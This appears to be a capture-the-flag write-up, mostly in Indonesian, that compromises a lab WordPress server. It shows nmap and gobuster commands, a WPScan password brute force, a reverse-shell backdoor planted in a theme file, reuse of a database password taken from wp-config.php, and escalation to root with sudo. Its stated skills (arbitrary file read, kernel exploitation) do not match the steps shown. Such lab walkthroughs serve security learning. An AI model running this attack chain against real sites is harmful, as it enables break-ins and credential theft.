FINDME

This engine provides an overview of attacks on web applications and how attackers can leverage the Remote Arbitrary File Read vulnerabilities to gain full system privilege on the target server.

OS: Linux

Skill Learned: Pentesting WordPress, Remote Arbitrary File Read, Kernel exploitation

Port Scanning, ditemukan port 7777 menjalankan service HTTP dan port 22 (SSH)

┌──(rwx4m㉿Home)-[~/htr/findme]

└─$ nmap -sVC -T4 10.1.2.101 -oN port.scan

Nmap scan report for 10.1.2.101

Host is up (0.28s latency).

Not shown: 998 closed tcp ports (reset)

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)

| ssh-hostkey:

| 2048 37:dc:66:a7:95:91:78:7b:90:7b:46:d9:ee:14:84:2f (RSA)

| 256 bc:38:b9:ac:b6:8d:82:bb:97:2f:a5:1f:e5:7a:0d:f6 (ECDSA)

|_ 256 36:8b:54:79:11:90:ad:a5:2c:5a:ed:2a:84:5b:de:0e (ED25519)

7777/tcp open http Apache httpd 2.4.18 ((Ubuntu))

|_http-server-header: Apache/2.4.18 (Ubuntu)

|_http-title: Nothing in here

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 61.42 seconds

Akses port 7777 tetapi tidak ada informasi apapun.

Menggunakan gobuster untuk mencari direktori atau target.

┌──(rwx4m㉿Home)-[~/htr/findme]

└─$ gobuster dir -u http://10.1.2.101:7777/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 50 -o gobuster.dir

===============================================================

Gobuster v3.6

by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)

===============================================================

[+] Url: http://10.1.2.101:7777/

[+] Method: GET

[+] Threads: 50

[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt

[+] Negative Status codes: 404

[+] User Agent: gobuster/3.6

[+] Timeout: 10s

===============================================================

Starting gobuster in directory enumeration mode

===============================================================

/services (Status: 301) [Size: 318] [--> http://10.1.2.101:7777/services/]

Progress: 5363 / 87665 (6.12%)^C

[!] Keyboard interrupt detected, terminating.

Progress: 5363 / 87665 (6.12%)

===============================================================

Finished

===============================================================

Setelah mengakses /services, didapatkan sebuah halaman WordPress.

Disini terlihat bahwa author adalah ADMIN. Setelah itu menuju ke halaman login (services/wp-login.php) dan mencoba menggunakan beberapa kredensial default tetapi gagal.

Karena diketahui user adalah admin, maka dilanjutkan dengan tahap bruteforce untuk mendapatkan katasandi yang benar. Disini saya menggunakan WPScan. Mencoba beberapa wordlist gagal tetapi berhasil menggunakan wordlists bawaan dari tool John.

┌──(rwx4m㉿Home)-[~/htr/findme]

└─$ wpscan --url http://10.1.2.101:7777/services --usernames admin --passwords /usr/share/john/password.lst

[!] Valid Combinations Found:

| Username: admin, Password: ChangeMe

Berhasil masuk sebagai Admin

Pada 404.php akan diganti dengan script reverse shell untuk membuat Backdoor.

Appearance -> Editor (/services/wp-admin/theme-editor.php)

Akses ke services/wp-content/themes/twentyseventeen/404.php. Maka shell didapatkan sebagai www-data.

Akses ke file /var/www/html/services/wp-config.php

Didapatkan kata sandi database.

Terdapat 2 user, ubuntu dan findme

Mencoba login sebagai user findme dan menggunakan katasandi dari database. Maka berhasil masuk sebagai user findme

Mendapatkan user flag.

findme@findme:~$ ls

user.txt

findme@findme:~$ cat user.txt

cat user.txt

da0865f3f5641a0953b50b93b6fb479b

Memeriksa hak akses sudo user findme

findme@findme:~$ sudo -l

sudo -l

[sudo] password for findme: passwordnyarahasia

Matching Defaults entries for findme on findme:

env_reset, mail_badpass,

secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User findme may run the following commands on findme:

(ALL : ALL) ALL

Terlihat bahwa, user findme memiliki hak akses sudo penuh tanpa batasan, yang berarti mereka dapat menjalankan perintah apa pun dengan hak administratif, termasuk menjalankan perintah sebagai root.

Dari hasil diatas maka kita berhasil masuk sebagai root dan mendapatkan root flag.

findme@findme:~$ sudo su

sudo su

root@findme:/home/findme# cd

root@findme:~# ls

root.txt

root@findme:~# cat root.txt

cat root.txt

39f40460578c23a5eb15d36b796a1631